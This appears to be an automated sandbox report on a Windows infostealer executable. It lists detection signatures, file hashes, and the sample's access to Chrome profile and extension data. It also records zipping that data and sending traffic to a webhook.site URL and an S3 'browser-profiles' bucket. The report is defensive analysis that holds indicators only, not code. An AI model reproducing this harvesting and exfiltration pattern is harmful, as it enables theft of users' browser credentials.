Edit tour

Windows Analysis Report
5EvHHcMjRg.exe

Overview

General Information

Sample name:	5EvHHcMjRg.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:	35005932465ca51b1bffcd168dd6c9386dbdecb78efacfbe4877b9b1e65da8b4
Analysis ID:	1501540
MD5:	1c6b522d985b2e60890a098e3d5e78b8
SHA1:	32885914ce6f49f589842b174a0e13d7dc334d5f
SHA256:	35005932465ca51b1bffcd168dd6c9386dbdecb78efacfbe4877b9b1e65da8b4
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Installs new ROOT certificates

Tries to harvest and steal browser information (history, passwords, etc)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May check the online IP address of the machine

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Stores large binary data to the registry

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

5EvHHcMjRg.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\5EvHHcMjRg.exe" MD5: 1C6B522D985B2E60890A098E3D5E78B8)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 5EvHHcMjRg.exe

Virustotal: Detection: 9%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 97.2% probability

Source: 5EvHHcMjRg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5EvHHcMjRg.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data\data_0	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe

Code function: 4x nop then mov ebp, edi

0_2_00AE3310

Source: Joe Sandbox View

IP Address: 104.26.8.44 104.26.8.44

Source: unknown

DNS query: name: ipapi.co

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /json/ HTTP/1.1Host: ipapi.coUser-Agent: ipapi.co/#go-v1.5Accept-Encoding: gzip

Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: tionaries":["en-US"],"dictionary":""},"supervised_user":{"metrics":{"day_id":154407}},"sync":{"autofill_wallet_import_enabled_migrated":true,"requested":false},"translate_site_blacklist":[],"translate_site_blocklist_with_time":{},"updateclientdata":{"apps":{"ghbmnnjooekpmoecnnnilnnbdlolhkhi":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"e8cfbc86-35d0-4127-9614-1b5020b1c2a0"},"nmmhkkegccagdldgiimedpiccmgmieda":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"dcb37f49-aa68-4ebc-a8d4-14eaa556e331"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"117","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"one piece chapter 1094 spoilers twitter\",\"baltimore drinking water parasites\",\"assassin creed mirage release\",\"rwd tesla model y\",\"michigan hockey johnny druskinis\",\"loki season 2 jonathan majors\",\"google pixel 8 pro leaks\",\"amazon prime deals prime day\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}}chedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340886957835794","type":2,"window_count":0},{"crashed":false,"time":"13340886960923866","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340886965177921","type":2,"window_count":1},{"crashed":false,"time":"13340890857002147","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":

Source: global traffic	DNS traffic detected: DNS query: ipapi.co
Source: global traffic	DNS traffic detected: DNS query: webhook.site
Source: global traffic	DNS traffic detected: DNS query: s3.ap-southeast-1.wasabisys.com

Source: unknown

HTTP traffic detected: POST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1Host: webhook.siteUser-Agent: Go-http-client/1.1Content-Length: 509Content-Type: application/jsonAccept-Encoding: gzip

Source: 5EvHHcMjRg.exe	String found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002012000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/ey
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002012000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/eyhttp://s3.amazonaws.com/doc/2006-03-01/
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002653000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/2024
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Secure Preferences.0.dr	String found in binary or memory: https://chrome.google.com/webstore
Source: Top Sites.0.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Top Sites.0.dr	String found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
Source: Secure Preferences.0.dr	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: Reporting and NEL.0.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/chromewebstore
Source: Reporting and NEL.0.dr	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
Source: Secure Preferences.0.dr	String found in binary or memory: https://docs.google.com/
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/document/:
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/document/J
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/presentation/:
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/presentation/J
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/spreadsheets/:
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/spreadsheets/J
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?us
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-autopush.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive-staging.corp.google.com/
Source: Secure Preferences.0.dr	String found in binary or memory: https://drive.google.com/
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://drive.google.com/:
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://drive.google.com/J
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Reporting and NEL.0.dr	String found in binary or memory: https://identity.nel.measure.office.net/api/report?catId=GW
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.00000000020AA000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://ipapi.co/json/
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002306000.00000004.00001000.00020000.00000000.sdmp, 000003.log3.0.dr	String found in binary or memory: https://login.live.com/
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002306000.00000004.00001000.00020000.00000000.sdmp, 000003.log3.0.dr	String found in binary or memory: https://login.live.com/Qnamespace-82374a30_585a_4672_b664_f0d0f51cee09-https://login.microsoftonline
Source: 000003.log3.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: 000003.log3.0.dr	String found in binary or memory: https://login.microsoftonline.com/Mnamespace-ff6bd74c_52d9_4769_b984_108ae96a1d99-https://support.mi
Source: Tabs_13340886879273065.0.dr, Tabs_13340886963547611.0.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: Session_13340886879173047.0.dr	String found in binary or memory: https://login.microsoftonline.com/savedusers?appid=ee272b19-4411-433f-8f28-5c13cb6fd407&wreply=https
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://mail.google.com/mail/:
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://mail.google.com/mail/J
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002306000.00000004.00001000.00020000.00000000.sdmp, 000003.log3.0.dr	String found in binary or memory: https://mem.gfx.ms/
Source: 000003.log0.0.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002585000.00000004.00001000.00020000.00000000.sdmp, 000003.log0.0.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: 000003.log0.0.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: 000003.log0.0.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: 000003.log0.0.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: 000003.log0.0.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: 000003.log0.0.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: 000003.log0.0.dr	String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=4&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002653000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240829212611-71434D56-1548-ED3D-AE
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002678000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240829212611-71434D56-1548-ED3D-AEE6-C75A
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002000000.00000004.00001000.00020000.00000000.sdmp, History.0.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: History.0.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002000000.00000004.00001000.00020000.00000000.sdmp, History.0.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: History.0.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002653000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002012000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101-
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de51010101--09AZ__azhttps://webhook.site/efe66
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.000000000207C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd0
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Secure Preferences.0.dr	String found in binary or memory: https://www.google.com/
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002557000.00000004.00001000.00020000.00000000.sdmp, Web Data.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://www.youtube.com/:
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://www.youtube.com/J
Source: 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002478000.00000004.00001000.00020000.00000000.sdmp, 5EvHHcMjRg.exe, 00000000.00000002.1923988098.0000000002124000.00000004.00001000.00020000.00000000.sdmp, 000003.log5.0.dr	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: 0_2_00AE98B0	0_2_00AE98B0
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: 0_2_00AE3930	0_2_00AE3930
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: 0_2_00B103A0	0_2_00B103A0
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: 0_2_00AF3320	0_2_00AF3320
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: 0_2_00AE3310	0_2_00AE3310
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: 0_2_00AED610	0_2_00AED610
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: 0_2_00B2BE40	0_2_00B2BE40
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: 0_2_00AF3F7B	0_2_00AF3F7B

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: String function: 00B1A440 appears 187 times
Source: C:\Users\user\Desktop\5EvHHcMjRg.exe	Code function: String function: 00B1CAE0 appears 181 times

Source: 5EvHHcMjRg.exe

Static PE information: Number of sections : 14 > 10

Source: 5EvHHcMjRg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 5EvHHcMjRg.exe	Static PE information: Section: /19 ZLIB complexity 0.9995047020287405
Source: 5EvHHcMjRg.exe	Static PE information: Section: /32 ZLIB complexity 0.997700058411215
Source: 5EvHHcMjRg.exe	Static PE information: Section: /65 ZLIB complexity 0.9991938793967052
Source: 5EvHHcMjRg.exe	Static PE information: Section: /90 ZLIB complexity 0.9928733648255814

Source: classification engine

Classification label: mal60.spyw.winEXE@1/116@3/3

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe

File created: C:\Users\user\AppData\Local\Google\Chrome\user_data.zip

Jump to behavior

Source: 5EvHHcMjRg.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\5EvHHcMjRg.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Affiliation Database.0.dr	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: Login Data For Account.0.dr, Login Data.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 5EvHHcMjRg.exe

Virustotal: Detection: 9%

Source: 5EvHHcMjRg.exe	String found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: 5EvHHcMjRg.exe	String found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: 5EvHHcMjRg.exe	String found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: 5EvHHcMjRg.exe	String found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: 5EvHHcMjRg.exe	String found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: 5EvHHcMjRg.exe	String found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
